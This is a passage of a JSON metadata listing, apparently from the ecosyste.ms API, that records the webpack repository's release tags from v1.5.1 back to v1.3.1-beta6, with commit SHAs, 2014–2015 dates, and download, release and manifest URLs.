:null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/re